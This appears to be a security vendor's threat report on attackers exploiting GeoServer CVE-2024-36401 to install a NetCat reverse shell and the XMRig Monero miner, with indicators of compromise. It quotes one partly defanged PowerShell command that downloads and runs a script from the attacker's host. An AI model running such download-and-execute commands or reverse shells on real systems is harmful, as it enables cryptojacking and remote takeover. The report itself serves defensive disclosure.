CoinMiner Attacks Exploiting GeoServer Vulnerability

AhnLab SEcurity intelligence Center (ASEC) has confirmed that the unpatched GeoServer is still under continuous attack. Threat actors are scanning for vulnerable GeoServer and installing CoinMiner. ASEC has also identified cases of infection in South Korea.

 

1. GeoServer Remote Code Execution Vulnerability (CVE-2024-36401)

GeoServer is an open-source Geographic Information System (GIS) server written in Java, providing a platform for spatial data processing. In 2024, a vulnerability (CVE-2024-36401) that allowed unauthorized users to execute remote code was disclosed. Since then, various threat actors have exploited this vulnerability to install malware.

In September 2024, Fortinet disclosed attack cases where the CVE-2024-36401 vulnerability was exploited to distribute malware such as GOREVERSE, SideWalk, Mirai, Condi, and CoinMiner. [1] Trend Micro also published a report on the attack campaign by Earth Baxia threat actor, which involved exploiting the CVE-2024-36401 vulnerability for spear-phishing against a Taiwanese government agency. [2]

 

2. Attack Case in South Korea

In South Korea, Windows environments with GeoServer installed were targeted. Given that the installed GeoServer was a version that had not patched the CVE-2024-36401 vulnerability, it is highly likely that the vulnerability was exploited during the malware installation process. The threat actor exploited the vulnerability to execute PowerShell commands and ultimately install NetCat and XMRig CoinMiner.

Figure 1. PowerShell process executed by vulnerability exploitation

 

2.1. NetCat

In the initial access phase, the threat actor executed a PowerShell command responsible for downloading a downloader. First, the threat actor downloaded the PowerShell script “adminc.ps1” to install NetCat. Netcat is a utility that allows users to transmit data to and from specific targets on a network connected by TCP/UDP protocols. However, it can also be exploited as a remote shell, and threat actors often use it to control infected systems. The NetCat executed via the “-e” argument connects to the C&C server and operates as a reverse shell, allowing the threat actor to control the infected system from the C&C server.

Figure 2. NetCat installation routine

 

2.2. XMRig

The distribution URL shows both a PowerShell script and a Bash script that installs XMRig. It is suspected that the threat actor used each script to install XMRig based on the operating system where GeoServer is installed. In the Windows environment, the vulnerable GeoServer executed the following PowerShell command, and the downloaded PowerShell script installed XMRig.

> IEX(New-ObjectNet.WebClient).DownloadString(‘hxxp://182.218.82.[1]4/js/1/gw.txt’)

Figure 3. PowerShell script to install XMRig

In attacks against Linux, it is likely that Bash scripts are being exploited. These attacks are similar to those against Windows, as the threat actor downloads XMRig and its configuration file. The Bash malware terminates processes that are suspected to be other CoinMiner strains and executes “startup.sh” to run XMRig.

Figure 4. Bash script to install XMRig

The Bash script also registers commands to Cron jobs for maintaining persistence. This command is responsible for executing the script downloaded from Pastebin.

Figure 5. Cron job executing additional commands from Pastebin

• url : pool.supportxmr.com:443
• user :  47DsNc5pK8rYBQF4ev3mNBct3tkkHuUmxeqCSSbX3YuBhXweSB9XeQbcPMqEBaSJy4bGrPxbdMJkphrVQ5AmastoEMpSjcU
• pass : x

 

3. Conclusion

Since the remote code execution vulnerability (CVE-2024-36401) of GeoServer was disclosed, cases of threat actors exploiting the vulnerability to install malware are still being identified. Threat actors are targeting environments with vulnerable GeoServer installations, including those of Windows and Linux, and have installed NetCat and XMRig coin miner. When a coin miner is installed, it uses the system’s resources to mine the threat actor’s Monero coins. The threat actor can then use the installed NetCat to perform various malicious behaviors, such as installing other malware or stealing information from the system.

 

MD5

0b3744373c32dc6de80dfc081200d9f8

310c17c19e90381114d47914bcb3ccf2

523613a7b9dfa398cbd5ebd2dd0f4f38

5e84c2bcca9486b6416a8b27ed4d845e

615b348974fb3b5aea898a172fadecf4

URL

http[:]//182[.]218[.]82[.]14/js/1/config[.]json

http[:]//182[.]218[.]82[.]14/js/1/gl[.]txt

http[:]//182[.]218[.]82[.]14/js/1/gw[.]txt

http[:]//182[.]218[.]82[.]14/js/1/s[.]rar

http[:]//182[.]218[.]82[.]14/js/1/startup[.]sh

IP

107[.]180[.]100[.]247